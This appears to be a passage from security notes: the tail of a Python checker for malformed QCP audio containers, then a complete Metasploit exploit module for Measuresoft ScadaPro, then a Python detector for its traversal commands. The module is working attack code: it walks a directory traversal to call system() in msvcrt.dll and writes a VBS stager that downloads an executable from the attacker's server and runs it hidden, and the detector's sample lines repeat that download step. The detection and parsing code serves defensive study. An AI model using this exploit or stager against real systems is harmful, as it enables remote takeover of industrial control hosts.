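def parse_qcp(blob: bytes):
    """Return (declared RIFF size, [(tag, declared chunk size, bytes actually present)])."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"QLCM":
        raise ValueError("not a RIFF/QLCM container")
    declared = struct.unpack_from("<I", blob, 4)[0]
    chunks = []
    off = 12
    while off + 8 <= len(blob):
        tag = blob[off:off + 4]
        size = struct.unpack_from("<I", blob, off + 4)[0]
        available = min(size, len(blob) - off - 8)
        chunks.append((tag, size, available))
        off += 8 + size + (size & 1)
    return declared, chunks


def check_qcp(blob: bytes) -> list:
    """List of findings; an empty list means the container looks well-formed."""
    findings = []
    declared, chunks = parse_qcp(blob)
    if declared != len(blob) - 8:
        findings.append(f"RIFF size {declared} does not match actual {len(blob) - 8}")
    for tag, size, available in chunks:
        if tag == b"fmt " and size > FMT_SPEC_SIZE:
            note = f"'fmt ' chunk declares {size} bytes (regular chunk is {FMT_SPEC_SIZE})"
            if size > HEAP_BUFFER_SIZE:
                note += f"; overruns a {HEAP_BUFFER_SIZE}-byte buffer by {size - HEAP_BUFFER_SIZE}"
            findings.append(note)
        if available < size:
            findings.append(f"{tag!r} chunk truncated: {available} of {size} bytes present")
    return findings


if __name__ == "__main__":
    print("benign   :", check_qcp(build_qcp()))
    print("malicious:", check_qcp(build_qcp(fmt_extra=700)))
```

Any declared chunk size is attacker-controlled, so the parser also bounds each chunk by the bytes that are really present; trusting the size field is the same class of mistake the player made.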

  7. ##
    # $Id: scadapro_cmdexe.rb 13737 2011-09-16 08:23:59Z sinn3r $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::EXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Measuresoft ScadaPro <= 4.0.0 Remote Command Execution',
          'Description'    => %q{
              This module allows remote attackers to execute arbitrary commands on
            the affected system by abusing a directory traversal in the 'xf' command
            (execute function). An attacker can execute system() from msvcrt.dll to
            upload a backdoor and gain remote code execution.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Luigi Auriemma',                           # Initial discovery/poc
              'mr_me <steventhomasseeley[at]gmail.com>',  # msf
              'TecR0c <tecr0c[at]tecninja.net>',          # msf
            ],
          'Version'        => '$Revision: 13737 $',
          'References'     =>
            [
              #[ 'CVE', '?'],
              #[ 'OSVDB', '?'],
              [ 'BID', '49613'],
              [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
              [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
              # seemed pretty accurate to us
              [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
            ],
          'DefaultOptions' =>
            {
              'InitialAutoRunScript' => 'migrate -f',
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              # truly universal
              [ 'Automatic', { } ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Sep 16 2011'))

        register_options(
          [
            Opt::RPORT(11234),
            OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
          ], self.class)
      end

      # couldn't generate a vbs or exe payload and then use the wF command
      # as there is a limit to the amount of data to write to disk.
      # so we just write out a vbs script like the old days.

      def build_vbs(url, stager_name)
        name_xmlhttp = rand_text_alpha(2)
        name_adodb   = rand_text_alpha(2)

        tmp = "#{@temp_folder}/#{stager_name}"

        vbs =  "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
        vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
        vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
        vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
        vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
        vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
        vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

        return vbs
      end

      def on_request_uri(cli, request)
        if request.uri =~ /\.exe/
          print_status("Sending 2nd stage payload to #{cli.peerhost}:#{cli.peerport}...")
          return if ((p=regenerate_payload(cli)) == nil)
          data = generate_payload_exe( {:code=>p.encoded} )
          send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
          return
        end
      end

      def exploit
        # In order to save binary data to the file system the payload is written to a .vbs
        # file and execute it from there.
        @payload_name = rand_text_alpha(4)
        @temp_folder  = "C:/Windows/Temp"

        if datastore['SRVHOST'] == '0.0.0.0'
          lhost = Rex::Socket.source_address('50.50.50.50')
        else
          lhost = datastore['SRVHOST']
        end

        # Build a new string instead of appending to lhost in place, which would
        # modify the SRVHOST datastore value itself
        payload_src = "#{lhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

        stager_name = rand_text_alpha(6) + ".vbs"
        stager = build_vbs(payload_src, stager_name)

        path = "..\\..\\..\\..\\..\\windows\\system32"

        createvbs        = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
        download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

        print_status("Sending 1st stage payload...")

        connect
        sock.get_once()
        sock.put(createvbs)
        sock.get_once()
        sock.put(download_execute)
        handler()
        disconnect

        super
      end

    end
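    The ScadaPro module only needs two lines on TCP/11234: 'xf%<dll path>,<export>,<argument>', where the path walks out of the application directory to msvcrt.dll and the export is system(). That format is simple enough to watch for on the wire. The Python below is an added example, not part of the Metasploit module or of Measuresoft's product: a parser for the xf command as the module emits it, plus a scoring step that flags traversal in the DLL path, the use of the C runtime, and the system export. The sample lines are constructed here (the two are shaped like the module's, the third is a hypothetical benign call; ScadaPro's real command catalogue is not on the page), and the message grammar is inferred from the module alone.

```python
import re

# "..\" or "../" anywhere in the DLL path
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# system is the export the module abuses; widen this set per environment (assumption)
DANGEROUS_EXPORTS = {"system"}


def parse_xf(line: str):
    """Split 'xf%<dll path>,<export>,<argument>' as sent by the module; None if not an xf command."""
    line = line.rstrip("\r\n")
    if not line.startswith("xf%"):
        return None
    parts = line[3:].split(",", 2)        # the argument may itself contain commas
    if len(parts) != 3:
        return None
    path, export, argument = parts
    return {"path": path, "export": export, "argument": argument}


def assess_xf(cmd: dict) -> list:
    """Reasons an xf command looks hostile; empty when nothing stands out."""
    reasons = []
    if TRAVERSAL.search(cmd["path"]):
        reasons.append("directory traversal in DLL path")
    if cmd["path"].lower().replace("/", "\\").endswith("\\msvcrt.dll") or cmd["path"].lower() == "msvcrt.dll":
        reasons.append("targets the C runtime (msvcrt.dll) rather than an application DLL")
    if cmd["export"].strip().lower() in DANGEROUS_EXPORTS:
        reasons.append(f"calls {cmd['export']}() with attacker-supplied argument")
    return reasons


def scan(lines) -> list:
    """Return (line number, export, reasons) for every suspicious xf command."""
    findings = []
    for number, raw in enumerate(lines, 1):
        cmd = parse_xf(raw)
        if cmd is None:
            continue
        reasons = assess_xf(cmd)
        if reasons:
            findings.append((number, cmd["export"], reasons))
    return findings


# Constructed sample capture: lines 1-2 follow the module's createvbs/download_execute
# shape (stager name shortened); line 3 is a hypothetical benign call.
SAMPLE_LINES = [
    "xf%..\\..\\..\\..\\..\\windows\\system32\\msvcrt.dll,system,"
    "cmd /c echo Set ab = CreateObject(\"Microsoft.XMLHTTP\") : ab.open \"GET\",\"http://10.0.0.5:8080/qwer.exe\",False"
    " >> C:/Windows/Temp/abcdef.vbs\r\n",
    "xf%..\\..\\..\\..\\..\\windows\\system32\\msvcrt.dll,system,start C:/Windows/Temp/abcdef.vbs\r\n",
    "xf%Alarms.dll,GetAlarmCount,\r\n",
    "some other protocol line\r\n",
]

if __name__ == "__main__":
    for number, export, reasons in scan(SAMPLE_LINES):
        print(f"line {number}: {export} -> {'; '.join(reasons)}")
```

The traversal check is the one that generalises: whatever the export, an xf command whose DLL path climbs out of the install directory is not something the product's own clients send.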
